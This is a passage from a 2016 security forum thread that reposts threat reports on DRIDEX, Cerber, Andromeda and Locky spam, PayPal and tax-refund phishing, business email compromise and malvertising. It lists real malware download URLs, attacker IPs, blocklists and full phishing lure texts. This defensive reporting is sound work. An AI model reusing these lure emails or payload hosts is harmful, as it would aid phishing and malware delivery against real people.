...  Instead of the usual -fake- invoice or notification baits, DRIDEX plays on people’s fears of having their accounts compromised. Besides the change in email subjects, DRIDEX also has new tricks... On top of its macro usage, it also leverages Certutil*, a type of command-line program in relation to certificate services to pass it off as a legitimate certificate. These two elements (use of macros and Certutil) combined together can add to DRIDEX’s prevalence and pose challenges to detection...
* https://technet.micr...3(v=ws.11).aspx
... Despite DRIDEX’s prevalence, users and organizations can do simple preventive measures such as not opening attachments and enabling macros when you receive emails from unknown sources. When you get emails about compromised accounts, check and verify first the source... enterprises can create policies that will block off email messages with attachments from unknown sources..."
(More detail at the trendmicro URL above.)
___

Windows 0-day vuln for sale ...
- https://www.trustwav...for-the-Masses/
May 31, 2016 - "... a zero day being offered-for-sale stood out among the other offerings in an underground market for Russian-speaking cyber criminals. This specific forum serves as a collaboration platform where one can hire malware coders, lease an exploit kit, buy web shells for compromised websites, or even rent a whole botnet for any purpose... The zero day in question claims to be a Local Privilege Escalation (LPE) vulnerability in Windows... We have notified Microsoft of the zero day offering and we continue to monitor the situation. We plan to update this blog post should we come across any new information."
> https://www.helpnets...ro-day-exploit/
___

APWG - Phishing Trends Report - Q1 2016
> https://apwg.org/apw...nter/APWG-News/
May 23 2016: "APWG releases its Phishing Trends Report for Q1 2016:
Some Key Findings in this report:
• The Retail/Service sector remained the most- targeted industry sector during the first quarter of 2016, with 42.71% of attacks.
• The number of brands targeted by phishers in the first quarter remained constant – ranging from 406 to 431 brands each month.
• The United States continued its position at top on the list of nations hosting phishing websites.
• In Q1 2016, 20 million -new- malware samples were captured.*
• The world's most-infected countries are led by China, where 57.24% of computers are infected, followed by Taiwan (49.15%) and Turkey at 42.52%."
> PDF/Full report: https://docs.apwg.or...ort_q1_2016.pdf

* https://www.av-test....istics/malware/
See "Total Malware" - charted
 

  

Edited by AplusWebMaster, 01 June 2016 - 02:14 PM.

[AplusWebMaster]

FYI...

IC3 Warns of Extortion Email Schemes
- https://www.us-cert....n-Email-Schemes
June 01, 2016 - "The Internet Crime Complaint Center (IC3) has issued an alert on extortion schemes that relate to recent high-profile data thefts. Fraudsters often use the news release of high-profile data breaches to scare victims into clicking-on-a-link or paying a ransom.
US-CERT encourages users and administrators to review the IC3 Alert* for details and refer to US-CERT Tip ST04-014** for information on social engineering and phishing attacks."
* https://www.ic3.gov/...016/160601.aspx
June 01, 2016 - "The Internet Crime Complaint Center (IC3) continues to receive reports from individuals who have received extortion attempts via e-mail related to recent high-profile data thefts. The recipients are told that personal information, such as their name, phone number, address, credit card information, and other personal details, will be released to the recipient's social media contacts, family, and friends if a ransom is not paid. The recipient is instructed to pay in Bitcoin, a virtual currency that provides a high degree of anonymity to the transactions. The recipients are typically given a short deadline. The ransom amount ranges from 2 to 5 bitcoins or approximately $250 to $1,200..."
 
** https://www.us-cert....s/tips/ST04-014
 

  

[AplusWebMaster]

FYI...

Fake 'PayPal' SPAM - malware delivery
- https://myonlinesecu...livers-malware/
3 June 2016 - "An email with the subject of 'Spam2Ls Suspicious activity on your PayPal Account' pretending to come from PayPal <service@ intl.paypal .com> with a -link- in the email that when -clicked- downloads a password stealing malware. At first, I thought this was a typical badly done phishing attempt, but no! this is a genuine malware delivery attempt... the link in the email http ://188.120.230.100 /paypal/report.pdf- and note the – after the pdf... Of course it is -not- a PDF but delivers report.exe. I am being told that this is - a version of LATENT BOT:
- https://www.fireeye....t_trace_me.html

188.120.230.100: https://www.virustot...00/information/
>>  https://www.virustot...6110b/analysis/

Update: a -second- run of this email with the subject just saying: 'Suspicious activity on your PayPal Account' and contains a link to http ://188.120.225.210 /paypal/report.pdf-

188.120.225.210: https://www.virustot...10/information/
>> https://www.virustot...31348/analysis/

Screenshot: https://myonlinesecu...nt-1024x399.png

3 June 2016: report.exe - Current Virus total detections 9/56*
.. MALWR** ... Payload Security*** ... shows interesting connections where this malware posts files to a webserver and downloads various data and zip files. All the zip files I tried, were not actually zip files but encrypted data... This is another one of the  files that unless you have “show known file extensions enabled“, can easily be mistaken for a genuine DOC/PDF/JPG or other common file instead of the .EXE/.JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1464928075/

** https://malwr.com/an...GY1NzJhYjAyZDE/
Hosts
107.161.145.159

*** https://www.reverse....vironmentId=100
Contacted Hosts
107.161.145.159: https://www.virustot...59/information/
>> https://www.virustot...24d15/analysis/
___

More Tech Support Scams
- https://www.ic3.gov/...016/160602.aspx
June 2, 2016 - "The Internet Crime Complaint Center (IC3) is receiving an increase in complaints related to technical support scams, where the subject claims to be an employee (or an affiliate) of a major computer software or security company offering technical support to the victim. Recent complaints indicate some subjects are claiming to be support for cable and Internet companies to offer assistance with digital cable boxes and connections, modems, and routers. The subject claims the company has received notifications of errors, viruses, or security issues from the victim's internet connection. Subjects are also claiming to work on behalf of government agencies to resolve computer viruses and threats from possible foreign countries or terrorist organizations. From January 1, 2016, through April 30, 2016, the IC3 received 3,668 complaints with adjusted losses of $2,268,982...
Technical Details ...
Variations and Trends ...
Additional Threats ...
Defense and Mitigation ..."
(More detail at the ic3 URL above.)
___

Apple - all services resume after outage
- http://www.reuters.c...n-idUSKCN0YO2R3
Jun 3, 2016 - "Apple Inc said all its services, including the popular App Store, have resumed following an outage that started late afternoon on Thursday. Apple's U.S. web page showed* all applications had resumed as of 11:55 p.m. Eastern Daylight Time (0355 GMT)... services related to iCloud and the Photos application have also resumed..."
* https://www.apple.co...t/systemstatus/
 

  

Edited by AplusWebMaster, 04 June 2016 - 05:15 AM.

[AplusWebMaster]

FYI...

Angler EK now evades EMET on Win7 ...
- https://www.fireeye....ploit_kite.html
June 06, 2016 - "We recently encountered some exploits from Angler Exploit Kit (EK) that are completely evading Microsoft’s Enhanced Mitigation Experience Toolkit (EMET). This is something we are seeing for the first time in the wild, and we only observed it affecting systems running Windows 7. Angler EK uses complex multi-layered code obfuscation and leverages multiple exploits...
Conclusion: The level of sophistication in exploits kit has increased significantly throughout the years. Where obfuscation and new zero days were once the only additions in the development cycle, evasive code has now been observed being embedded into the framework and shellcode.
Remediation guidance: Although there are no quick solutions for the DEP, EAF, and EAF+ evasion techniques, organizations can mitigate this threat through a robust vulnerability management program for end user systems, which includes the installation of security updates for third party software. Applications such as Adobe Flash, web browsers, and Oracle Java should be patched routinely, prioritizing critical patches, or removed if possible. Because the web browser plays an important role in the infection process, disabling browser plugins for Flash or Silverlight may also reduce the browser attack surface."

- http://arstechnica.c...microsoft-emet/
Jun 6, 2016 - "... there's nothing stopping Angler from using the EMET evasions to install other malicious applications..."
___

Malvertising - DoubleClick Ad Fraud
- https://blog.malware...click-ad-fraud/
June 6, 2016 - "Malvertising isn’t only used to infect users via drive-by downloads or to deceitfully push fake-software-updates. A campaign currently going on via the -TrafficHolder- adult ad platform leverages the promise of raunchy videos to lure people into ad fraud. The trick is simple and yet effective. While browsing, users are automatically redirected to what appears to be YouTube for adult content. The page looks completely normal, except for the fact that it is a giant image slapped across an actual ‘normal’ WordPress website. To the naked eye the large JPEG or GIF looks legit, and curious visitors may me tempted to push the Play button to watch the saucy movie. Rather than playing any content, this click is used to launch a real and paid advert via Google’s DoubleClick. This technique referred to as ‘clickjacking’ is very popular and can take different forms while the end goal remains to generate legitimate-looking clicks on adverts:
> https://blog.malware...6/06/Flow__.png
The crooks are using hundreds of what appear to be -bogus- (insurance, loans and other scams) WordPress sites to carry out this fraudulent scheme. A simple layer is added on top of the page to give this optical illusion. JavaScript code is able to track mouse movements and knows if the user has actually clicked on the advert... The fake adult image (which covers the whole page) is dynamically generated on the fly and a new one is retrieved randomly from a remote server (5.39.99.215)... that image will disappear after a few seconds of inactivity to reveal the actual underlying WordPress site. The majority of the sites we found were highly suspicious and most likely used for hosting various other spammy content. When users click to play the -bogus- video, their action triggers the ad fraud component of this scam by abusing Google’s DoubleClick... In this particular malvertising instance, users are not put at risk with malicious code, they are simply being duped so that the crooks behind this can generate ad money for each click. However, we have also observed redirections to exploit kits via the same ad platform (TrafficHolder) so you should be extra vigilant and use a proactive line of defence such as exploit protection to avoid getting infected. We have reported this ad fraud to Google and will keep monitoring the situation as one can expect those rogue actors to come up with a different plan to monetize low quality traffic."

5.39.99.215: https://www.virustot...15/information/
___

Password Re-user? Get Ready to Get Busy
- http://krebsonsecuri...et-to-get-busy/
June 6, 2016 - "In the wake of megabreaches at some of the Internet’s most-recognized destinations, don’t be surprised if you receive password-reset-requests from numerous companies that didn’t experience a breach:
Some big name companies — including Facebook and Netflix — are in the habit of combing through huge data leak troves for credentials that match those of their customers and then forcing a password reset for those users. Netflix .com, for example, sent out a notification late last week to users who made the mistake of re-using their Netflix password at Linkedin, Tumblr or MySpace. All of three of those breaches are years old, but the scope of the intrusions (more than a half -billion- usernames and passwords leaked in total) only became apparent recently when the credentials were posted online at various sites and services:
>> http://krebsonsecuri...ce-580x1031.png
... Netflix is taking this step because it knows from experience that -cybercriminals-will- be using the credentials leaked from Tumblr, MySpace and LinkedIn to see if they work on a variety of third-party sites (including Netflix)... Facebook* also has been known to mine-data-leaked in major external password breaches for any signs that users are re-using their passwords at the hacked entity."
* http://krebsonsecuri...r-adobe-breach/
 

  

Edited by AplusWebMaster, 07 June 2016 - 04:33 AM.

[AplusWebMaster]

FYI...

LinkedIn breach data Used for Malicious E-Mails
- https://isc.sans.edu...l?storyid=21139
2016-06-07 - "Yesterday, the German federal CERT (CERT-BUND) warned of phishing e-mails that are more plausible by using data that appears to originate from the recently leaked LinkedIn data set. The e-mail address the recipient by full name and job title. Typically, the attachments claim to contain an invoice. We have since received a couple of users who reported receiving e-mails that match the pattern. For example:
> https://isc.sans.edu... 8_44_56 AM.png
The e-mails arrive in different languages. They address the recipient by full name, job title and company name, to make the e-mail more plausible. This is similar to the way social media was used in the past to create more convincing phishing e-mails. For example, see this old article from 3 years ago* about how Facebook data is used in this way. With the LinkedIn leak, data has become available that wasn't reachable by simple screen scrapers (or API users) in the past."
* https://isc.sans.edu...l?storyid=15265
2013-02-25
___

TeamViewer confirms number of abused user accounts is “significant”
- http://arstechnica.c...s-account-hack/
Jun 5, 2016 - "It was a tough week for TeamViewer, a service that allows computer professionals and consumers to log into their computers from remote locations. For a little more than a month, a growing number of users have reported their accounts were accessed by criminals who used their highly privileged position to drain PayPal and bank accounts. Critics have speculated TeamViewer itself has fallen victim to a breach that's making the mass hacks possible. On Sunday, TeamViewer spokesman Axel Schmidt acknowledged to Ars that the number of takeovers was 'significant', but he continued to maintain that the compromises are the result of user passwords that were compromised through a cluster of recently exposed megabreaches involving more than 642 million passwords belonging to users of LinkedIn, MySpace, and other services..."

- http://www.zdnet.com...ck-significant/
"... If you think you may have been involved in the breach, check HaveIbeenPwned* and change your passwords as soon as possible..."
* https://haveibeenpwned.com/
 

  

Edited by AplusWebMaster, 07 June 2016 - 11:03 AM.

[AplusWebMaster]

FYI...

Fake 'résumé' SPAM - drops Cerber ransomware
- http://blog.dynamoo....esume-spam.html
8 June 2016 - "This -fake- résumé spam leads to malware:
    From:    Dora Bain
    Date:    7 June 2016 at 03:37
    Subject:    Good morning
    What's Up?
    I visited your website today..
    I'm currently looking for work either full time or as a intern to get experience in the field.
    Please look over my CV and let me know what you think.
    With gratitude,
    Dora Bain

In the sample I saw, the attached file was named Dora-Resume.doc and had a VirusTotal detection rate of 11/56*. The Malwr report** and Hybrid Analysis*** show that a -script- executes that tries to make a political statement along the way.. This downloads a file from 80.82.64.198 /subid1.exe which is then saved as %APPDATA%\us_drones_kills_civilians.exe which VirusTotal gives a detection rate of 20/56[4] and seems to give an overall diagnosis as being Cerber ransomware. The IP address of 80.82.64.198 is allocated to an apparent Seychelles shell company called Quasi Networks Ltd (which is probably Russian). There seems to be little if anything of value in 80.82.64.0/24 which could be a good candidate to block. Incidentally, the IP hosts best-booters .com which is likely to be a DDOS-for-hire site. According to the VT report[5] the malware scans for a response on port 6892 on the IP addresses 85.93.0.0 through to 85.93.63.255. However, this Hybrid Analysis[6] indicates that the only server to respond is on 85.93.0.124 (GuardoMicro SRL, Romania) which is part of the notoriously bad 85.93.0.0/24 which is a good thing to block. That report also shows traffic to ipinfo .io which is a legitimate "what is my IP" service. While not malicious in its own right, it does make a potentially good indicator of compromise.
Recommended blocklist:
80.82.64.0/24
85.93.0.0/24 "
* https://virustotal.c...sis/1465377335/

** https://malwr.com/an...TM0ODJlYWI5N2E/

*** https://www.hybrid-a...vironmentId=100

4] https://virustotal.c...sis/1465377604/
TCP connections
52.29.28.100: https://www.virustot...00/information/

5] https://virustotal.c...sis/1465377604/
TCP connections
52.29.28.100

6] https://www.hybrid-a...vironmentId=100
___

Automated tax refund notification – Phish
- https://myonlinesecu...ation-phishing/
8 June 2016 - "One of the frequent subjects in a phishing attempt is 'Tax returns' or 'tax refunds', where especially in UK, you need to submit your Tax Return online. The phishers have caught on to the fact that in UK -all- government services are now dealt with by a common gateway and you need to register for a Government Gateway account. This one wants your personal details and your credit card and bank details...

Screenshot: https://myonlinesecu...sh-1024x428.png

If you follow the link:   http ://americasfootcenter .com/automated.refund.application.online.start.account.for.special.refund/1255bbc5b01e0284db618c7bc75d643c/registration.php?ip=[redacted]
.. you see a webpage asking for name, address, birth date etc. looking like:
> https://myonlinesecu...sh-1024x560.png
.. Then you are asked for your address and mobile number:
> https://myonlinesecu..._2-1024x461.png
.. Next credit card details:
> https://myonlinesecu...way_phish_3.png
.. Next is Bank details:
> https://myonlinesecu...way_phish_4.png
.. Next is a 'done' page, where you are told that it will take 5 to 7 days to deal with and give you the refund. and you are then automatically forwarded to the genuine gov .uk start page:
> https://myonlinesecu...way_phish_5.png
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... whether it is a straight forward attempt, like this one, to -steal- your personal, bank, credit card or email and social networking log in details..."

americasfootcenter .com: 50.87.146.116: https://www.virustot...16/information/
>> https://www.virustot...9c4cc/analysis/

>> https://www.virustot...33d87/analysis/
 

  

Edited by AplusWebMaster, 08 June 2016 - 05:57 AM.

[AplusWebMaster]

FYI...

'Chat' for Ransom Attempts
- http://blog.trendmic...ansom-attempts/
June 9, 2016 - "... The innovation brought forth by some new JIGSAW variants? Instead of using dark web sites, it communicates to the user via… live chat. The threats displayed by these new variants (detected as Ransom_JIGSAW.H) are similar to those shown by the earlier JIGSAW variants...
JIGSAW ransom note: https://blog.trendmi.../06/jigsaw1.png
One big difference should be apparent: there is now a link which appears to go to a live chat session:
> https://blog.trendmi.../06/jigsaw3.png
The attackers actually have people standing by to answer questions... The cybercriminals behind this JIGSAW variant didn’t build their own chat client; instead they used onWebChat, a publicly available chat platform. A script that calls the onWebChat client is embedded in the website. The connection to onWebchat’s servers is protected with SSL/TLS, making packet capture and interception more difficult in the absence of a proxy intercepting encrypted traffic. We have reached out to onWebChat and informed them of this issue.
Interestingly, the cybercriminal on the other end of the chat conversation doesn’t actually know when the user was infected. The “timer” is only based on a cookie set on the affected machine – if this cookie is deleted, the countdown resets to 24 hours. As a result, the cybercriminals are actually reliant on the user’s honesty when it comes to finding out how much ransom should be paid! There are some perverse incentives at work for cybercriminals to decide to focus on their “customers” (i.e., victims) in this way. Whatever those incentives may be, the victims of this crime now have an immediate, human voice to go to when their files are encrypted. This may predispose them to pay up if they are victimized – something we do not encourage. One more thing to note. While looking into the site hosting this instant chat, we found a -second- piece of malware that used the same site. This one, however, was “only” lockscreen malware, which can be bypassed and removed by booting into safe mode... This kind of “customer-centric” approach to ransomware is unusual, although not entirely unprecedented... Users can likewise take advantage of our free tools such as the Trend Micro Lock Screen Ransomware Tool*, which is designed to detect and remove screen-locker ransomware; as well as Trend Micro Crypto-Ransomware File Decryptor Tool**, which can decrypt certain variants of crypto-ransomware without paying the ransom or the use of the decryption key..."
* https://esupport.tre...rt/1105975.aspx

** https://esupport.tre...US/1114221.aspx
___

Fake 'Fedex' SPAM - leads to Andromeda
- http://blog.dynamoo....gent-fedex.html
8 June 2016 23:21 - "This fake FedEx (or FeDex?) spam has a malicious attachment:
    From:    Secure-FeDex
    Date:    8 June 2016 at 18:17
    Subject:    David Bernard agent Fedex
    Deаr [redacted] ,
    We tried tо delivеr уour item on June 08th, 2016, 10:45 АM.
    The delivеry attempt failеd because thе аddress was business сlоsed оr nobodу сould sign fоr it.
    Тo piсk up the package, please, рrint the receipt that is аttаchеd to this еmаil and visit FеdEx
    office indicated in the invoice. If the pасkagе is nоt piсkеd up within 24 hоurs, it will bе returnеd to thе shipper.
    Receipt Number:  98402839289
    Eхpесted Delivеrу Dаte: June 08th, 2016
    Class: Intеrnаtional Paсkаge Sеrviсe
    Servicе(s): Delivеrу Cоnfirmation
    Status: Notifiсatiоn sent
    Thank you for choosing our service ...

In this case there was an attachment FedEx_track_98404283928.zip which unzipped into a folder FedEx_track_98404283928 containing in turn a -malicious-script- FedEx_track_98404283928.js which (according to Malwr*) attempts to download a binary from one of the following locations:
www .brusasport .com/Brusa/vario/direct/teamviiverupdate2918372.exe
www .microsoft .com/Brusa/vario/direct/teamviiverupdate2918372.exe
www .mega .net/Brusa/vario/direct/teamviiverupdate2918372.exe
www .google .com/Brusa/vario/direct/teamviiverupdate2918372.exe
www .yahoo .com/Brusa/vario/direct/teamviiverupdate2918372.exe
Only the first one is a valid download location, the rest are a smokescreen. The dropped binary has a detection rate of 5/56** but automated analysis [1] [2] [3] is inconclusive. However those reports do seem to indicate attempted network traffic to:
secure .adnxs.metalsystems .it
upfd .pilenga .co.uk
These two subdomains appears to have been hijacked from unrelated Register.IT customers and are hosted on a questionable-looking customer of OVH Italy on 188.165.157.176 ... Other -hijacked- subdomains on the same IP are:
tgr .tecnoagenzia .eu
bmp.pilenga .co.uk
maps.pilenga .co.uk
sundication .twitter.luigilatruffa .com
tit.pilenga .net
trw.pilenga .net
ocsp.pilenga .net
plda.pilenga .net
maps.pilenga .mobi
plda.pilenga .mobi
This Tweet[4] from ‏@pancak3lullz indicates that this IP is associated with Anrdomeda rather than the usual recent patterns of Locky or Dridex (which has.. err.. dried up recently). It appears to have been a malicious IP for more than a month[5]. Of interest is that almost every part of this chain (including the spam sending IP of 31.27.229.22) is in Italy. As with a great deal of recent spam, this is delivered via a .js script in a ZIP file. If you can configure your mail filters to reject such things then you will be a whole lot safer.
Recommended blocklist:
188.165.157.176/30 "
* https://malwr.com/an...2I0MGIxODc3OTU/

** https://www.virustot...sis/1465421690/

1] https://malwr.com/an...zMxYTEyZmM0YmQ/

2] https://sandbox.deep...11f8fa82586980/

3] https://www.hybrid-a...vironmentId=100

4] https://twitter.com/...191468238983168

5] https://malwr.com/an...zhlOGJlODE3MGI/
___

Increased Risks from Macro-Based Malware
- https://www.us-cert....o-Based-Malware
June 09, 2016 - "Microsoft Office applications use macros to automate routine tasks. However, macros can contain malicious code that can be used to exploit vulnerable systems. Recently, there has been a resurgence of malware that is spread via macros. Individuals and organizations should proactively secure systems against macro-based malware. Users and administrators are encouraged to review CERT's article (link* is external) on the resurgence of macro exploitation and apply recommendations outlined in CERT Australia's report** on macro security."
* https://insights.sei...ave-macros.html
June 8, 2016
** http://www.asd.gov.a...ro_Security.pdf
___

Google Dorking ...
Google Dorking sounds harmless, but it can take your company down. Here's what you need to know to avoid being hacked
- http://www.darkreadi.../a/d-id/1325842
6/9/2016
> http://www.darkreadi...ud-security.asp

- http://arstechnica.c...research-finds/
Jun 9, 2016 - "About 11 percent of shared cloud folders contain nasty surprises, according to recent research..."
___

Rotten Apples: Apple-like Malicious Phishing Domains
- https://www.fireeye....ples_apple.html
June 07, 2016 - "At FireEye Labs we have an automated system designed to proactively detect newly registered malicious domains. This system observed some -phishing- domains registered in the first quarter of 2016 that were designed to appear as legitimate Apple domains. These -phony-Apple-domains- were involved in phishing attacks against Apple iCloud users in China and UK. In the past we have observed several phishing domains targeting Apple, Google and Yahoo users; however, these campaigns are unique as they are serving the same malicious phishing content from different domains to target Apple users. Since January 2016 we have observed several phishing campaigns targeting the Apple IDs and passwords of Apple users. Apple provides all of its customers with an Apple ID, a centralized personal account that gives access to iCloud and other Apple features and services such as the iTunes Store and App Store. Users will provide their Apple ID to sign in to iCloud[.]com, and use the same Apple ID to set up iCloud on their iPhone, iPad, iPod Touch, Mac, or Windows computer..."
(More detail at the fireeye URL above.)
 

 

Edited by AplusWebMaster, 09 June 2016 - 01:10 PM.

[AplusWebMaster]

FYI...

Malvertising: How to beat bad ads
- https://blog.malware...o-beat-bad-ads/
June 13, 2016 - "... Malvertising, or malicious advertising, is the use of online advertising to distribute malware with little to no user interaction required. You could be researching business trends on a site like NYTimes .com and, without ever having clicked on an ad, be in trouble. A tiny piece of code hidden deep in the ad [re]directs your computer to criminal servers. These servers catalog details about your computer and its location, and then select the 'right' malware for you... the problem’s only getting worse. In 2015, Google disabled more than 780 million bad ads, a nearly 50% increase over 2014. According to RiskIQ*, in just the first half of 2015, malvertising increased 260% compared against all of 2014... infected ads often use an iframe, or invisible webpage element, to do its work. You don’t even need to click on the ad to activate it — just visit the webpage hosting the ad. (Hence the term 'drive-by download'). The iframe redirects to an exploit landing page, and malicious code attacks your system from the landing page via exploit. The exploit kit delivers malware — and 70 percent of the time, it’s ransomware..."
(More detail at the malwarebytes URL above.)
* https://www.riskiq.c...ag/malvertising
 

  

[AplusWebMaster]

FYI...

Hacks sought to steal $3bln+ through wire-transfer fraud - FBI
- http://www.reuters.c...l-idUSKCN0Z023W
Jun 14, 2016 - "Hackers have sought to steal more than $3 billion from businesses in a pernicious, fast-growing type of scam in which criminals impersonate company executives in emails ordering large wire transfers, the Federal Bureau of Investigation warned on Tuesday. The FBI disclosed the data as it launched a public awareness campaign providing tips on how to defend against such scams... U.S. and foreign victims reported 22,143 cases involving business email compromise cases in which cyber criminals sent requests for some $3.1 billion in fraudulent transfers from October 2013 through last month, according to the FBI. That represents a significant increase from the agency's previous tally, which put attempted losses at $2.3 billion through February of this year. Supervisory Special Agent Mitchell Thompson said victims should notify the FBI immediately if they find they have been victimized in such scams, so the bureau can work with agents overseas to ask foreign banks to -freeze- the funds before fraudsters pull them out of the banking system... The bulk of the cases involved requests to transfer funds to banks in Hong Kong and China, though a total of 79 countries have been identified to date, according to the bureau. Thompson said he could not say how much money victims actually lost through the schemes, but said about one-in-four U.S. victims respond by wiring money to fraudsters... The FBI said the sharp jump in cases since its last tally was due to the high level of recent activity, as well as an effort by law enforcement agencies around the world to identify such scams as business email compromise, rather than generic wire fraud. The FBI said it has seen a 1,300 percent increase in identified exposed losses since January 2015. The size of the losses vary widely from case to case, from about $10,000 to tens of millions of dollars, according to Thompson. Austrian aircraft parts FACC said in January that it lost about 50 million euros ($55 million) through such a scam."

 

>> https://www.fbi.gov/...and-individuals

>> https://www.ic3.gov/...016/160614.aspx

Business Email Compromise
- http://blog.trendmic...ed-bec-schemes/
June 9, 2016 - "... Today, Business Email Compromise (BEC) scammers use this regard of authority to target internal employees who may deal with and handle the finance of the company: the Chief Financial Officers (CFOs). Business Email Compromise (BEC) campaigns can be considered as one of the most dangerous threats that businesses of any size today are at risk of becoming a victim of. Not only does it not rely on detectable malicious components for its success—instead relying on pure deception and social engineering — it targets entities in the company that are responsible for the financial welfare of said company and those vulnerable to such underhanded tactics (such as executives, HR personnel, personal assistants, etc). It is a threat that can (and has already had) rob businesses blind. In our continued efforts to study and understand BECs — an effort that also included looking into the BEC incidents of the past couple of years — we discovered some underlying patterns that organizations may find interesting. Some of them include:
• 40% of BECs in the past two years have targeted CFOs more than any other company position;
• 31% of BECs used the position of CEO to set up the scam;
• Some of the most commonly used email subjects for BEC mails include the words ‘Transfer’, ‘Request’, and ‘Urgent’.
Wire frauds - Pick your poison: Apart from the now-infamous assuming of an executive’s identity or “CEO Fraud”, wire frauds can be deployed in a variety of ways — and at a cheap price, too. Malware used in BEC schemes can be purchased online for US$50, while some may even come for free. In other cases, the scam may go further than email spoofing. The cybercriminal can turn to hacking the legitimate email account to ask for wire transfers involving fraudulent accounts on the other end. Through phishing or keylogger, cybercriminals can steal credentials that would allow them to send transfer wire requests. Some may even take the air of legitimacy a notch higher via a quick phone call to seal the deal. Businesses dealing with foreign suppliers are also ripe targets for payment modification — that is, changing where the payment should be directed to... Because of the duplicitous and insidious nature of BECs, simple best practices or security solutions are not enough to effectively defend against them. BEC scams highlight how employees are the primary and final line of defense when it comes down to protecting an organization’s valued assets. Security awareness and solutions that can go beyond the traditional email threats create the barrier between company response and a thousand dollar wire transfer..."
 

  

Edited by AplusWebMaster, 14 June 2016 - 03:02 PM.

[AplusWebMaster]

FYI...

Do NOT run JS email attachments ...
- http://www.infoworld...ransomware.html
Jun 14, 2016 - "Attackers are infecting computers with a new ransomware program called RAA that's written entirely in -JavaScript- and locks users' files by using strong encryption. Most malware programs for Windows are written in compiled programming languages like C or C++ and take the form of portable executable files such as .exe or .dll. Others use command-line scripting such as Windows batch or PowerShell. It's rare to see client-side malware written in web-based languages such as JavaScript, which are primarily intended to be interpreted by browsers. Yet the Windows Script Host, a service built into Windows, can natively execute .js and other scripting files out of the box. Attackers have taken to this technique in recent months, with Microsoft warning about a spike in malicious email attachments containing JavaScript files back in April. Last month, security researchers from ESET warned of a wave of spam that distributes the Locky ransomware through .js attachments. In both of those cases the JavaScript files were used as malware downloaders - scripts designed to download and install a traditional malware program. In the case of RAA, however, the whole ransomware is written in JavaScript. According to experts from tech support forum BleepingComputer*, RAA relies on CryptoJS, a legitimate JavaScript library, to implement its encryption routine. The implementation appears to be solid, using the AES-256 encryption algorithm..."
* http://www.bleepingc...ing-javascript/
___

Advanced phishing tactics used to steal PayPal credentials
- https://blog.malware...al-credentials/
June 14, 2016 - "Phishers are back to using an old tactic in a -new- fashion to get hold of their victims’ credentials. One of the first lessons you will learn during anti-phishing training is to hover over the links in a mail to see if they point to the site where you would expect them to point. Although good advice, this is NOT a guarantee that you are going to be safe. Always visit sites directly, never follow the URLs presented to you in emails-or-attachments... As reported by UK malware researcher @dvk01uk*, the phishers are using -Javascript- to send the user to the promised PayPal site while the login credentials are being-sent-to-an-entirely-different domain:
> https://twitter.com/...233789531852800
'The javascript runs as soon as the page (HTML attachment) is loaded and -intercepts- all posts to PayPal .com and -diverts- them to the actual phishing page to accept all your details, if you are unwise enough to fall for this trick.'
In this case, the phish was pointing to PayPal and the phishing page is www[dot]egypt-trips[dot]co which appears to be an unused WordPress site. (We have informed the registrant of the phish, so we hope they will take appropriate measures)... The original blogpost about this particular phish, including screenshots and code snippets, can be found here:  
> https://myonlinesecu...hishing-attack/

egypt-trips[dot]co: 160.153.162.9: https://www.virustot....9/information/
>> https://www.virustot...3189e/analysis/

>> https://www.virustot...959af/analysis/

>> https://www.virustot...f97d0/analysis/
 

  

Edited by AplusWebMaster, 15 June 2016 - 01:28 PM.

[AplusWebMaster]

FYI...

Locky/Dridex trying to come back
- https://myonlinesecu...g-to-come-back/
16 June 2016 - "Since yesterday 15 June 2016, we have been hearing about a slow but steady trickle of Locky ransomware / Dridex banking Trojan -JavaScript- downloaders inside zip file attachments. The first one I received on my  mail server were at about 4 am UTC today. I am pretty sure these are only test mails, because the JavaScript is so well detected and the site linked to inside the JavaScript is a site that was seen several weeks ago & is currently down, although appears to have still been active yesterday at some stage. The emails that I am currently seeing this morning  are very basic and simple, but they do always catch the unwary or curious user. They are all pretending to come from various yahoo email addresses with a subject of Photos and a completely blank / -empty- email body. One of the  emails looks like:
From: Mitchell <Mitchell842@ yahoo .com>
Date: Thu 16/06/2016 05:55
Subject: Photos
Attachment: Photo.zip

Body content: Blank/Empty

All copies I have seen so far today contain exactly the same docment_380578378.js inside the photo.zip
(VirusTotal Detections 35/55*). Payload Security** shows the download was from shivshanti .in/n78f7gbniu
(VirusTotal detections 46/55***) which shows the same file from 2 weeks ago before the Necurs botnet went down and Locky was unable to spread with its previous intensity. It looks like our short holiday from the onslaught of email delivered malware has come to an end and we should all be prepared for a massive attack over the next few days."
* https://www.virustot...sis/1466045706/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
43.242.215.197
85.17.19.102
195.154.69.90
93.170.123.60
95.211.174.92

*** https://www.virustot...sis/1466045706/

shivshanti .in: 43.242.215.197: https://www.virustot...97/information/
>> https://www.virustot...8c29b/analysis/
 

  

Edited by AplusWebMaster, 16 June 2016 - 08:44 AM.